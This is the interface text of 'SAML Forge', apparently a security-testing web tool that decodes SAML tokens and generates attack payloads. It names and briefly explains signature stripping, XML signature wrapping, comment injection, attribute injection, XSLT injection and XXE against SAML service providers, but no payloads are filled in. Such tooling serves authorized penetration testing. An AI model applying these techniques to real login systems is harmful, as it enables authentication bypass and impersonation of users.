SAML Forge decode · attack · forge

← All Tools
SAML Token Input
Parsed XML
Decode a token to see highlighted XML
Key Fields
Key fields will appear here after decode
Attributes
Attribute assertions will appear here after decode
Edit XML modify before generating attacks
Attack Payloads select · configure · generate
1
Signature Stripping
Remove <ds:Signature> block entirely — some SPs skip validation when no signature is present.
Removes every <ds:Signature> element found in the assertion.
2
XML Signature Wrapping (XSW)
Valid signature covers decoy; SP processes attacker-controlled element. 3 variants.
3
Comment Injection
Insert <!----> inside an element's text — parsers (Xerces) strip comment nodes, concatenating the surrounding text nodes.
Result:
Vulnerable parsers (Java/Xerces) strip the comment node and concatenate text nodes — the SP sees the joined string.
4
Attribute Injection
Add or overwrite any attribute in the AttributeStatement. Re-encodes the modified assertion.
5
XSLT Injection
Inject a malicious <ds:Transform> — vulnerable SAML libraries (Xalan, Saxon) execute embedded XSLT during signature processing.
6
XXE in SAML
Inject DOCTYPE with external entity reference into SAML XML for server-side XXE exploitation.
Attack Output
Select an attack and click "Generate Payload"
⚠ For authorized testing and educational use only. Do not use against systems you do not own or have explicit permission to test.